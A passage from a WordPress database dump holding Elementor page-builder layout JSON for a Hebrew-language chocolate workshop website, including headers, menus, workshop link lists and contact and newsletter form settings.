bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"7b6d813b\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"702cf53c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"718f913c\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\",\"recaptcha_badge\":\"bottomright\"}],\"show_labels\":\"\",\"button_text\":\"Subscribe\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(720,155,'_elementor_version','2.9.8'),(722,155,'_elementor_conditions','a:1:{i:0;s:21:\"include/singular/post\";}'),(723,156,'_elementor_template_type','single'),(724,156,'_elementor_edit_mode','builder'),(725,156,'_wp_page_template','default'),(726,156,'_elementor_page_settings','a:1:{s:13:\"page_template\";s:16:\"elementor_canvas\";}'),(727,156,'_elementor_data','[{\"id\":\"5143e12f\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"71c4466d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"5c8ffdc1\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"48141d39\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\"},\"elements\":[{\"id\":\"50bf4905\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"d5a34b\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"60b32fa\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"f297d92\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"e0d5494\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05db\\u05ea\\u05d5\\u05d1 \\u05d0\\u05ea \\u05d4\\u05db\\u05d5\\u05ea\\u05e8\\u05ea \\u05db\\u05d0\\u05df\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"97fc875\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9efbb93\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"31e0ebc\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"\\u05d8\\u05d5\\u05e4\\u05e1 \\u05e6\\u05d3\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"},{\"_id\":\"message\",\"field_type\":\"textarea\",\"field_label\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4\",\"placeholder\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"message\"}],\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"34056794\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"79ba6502\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"c9740a4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"62d9ea7a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"2a4010bc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"527df496\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%96%D7%95%D7%92%D7%99%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%9E%D7%A1%D7%99%D7%91%D7%AA-%D7%A8%D7%95%D7%95%D7%A7%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"8c21433\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%97%D7%91%D7%A8%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%99%D7%9C%D7%93%D7%99%D7%9D\\/\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"227b633f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"73e3f56a\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4a1d5ee3\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"28ab3e99\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"7b6d813b\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"702cf53c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"718f913c\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"Subscribe\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea 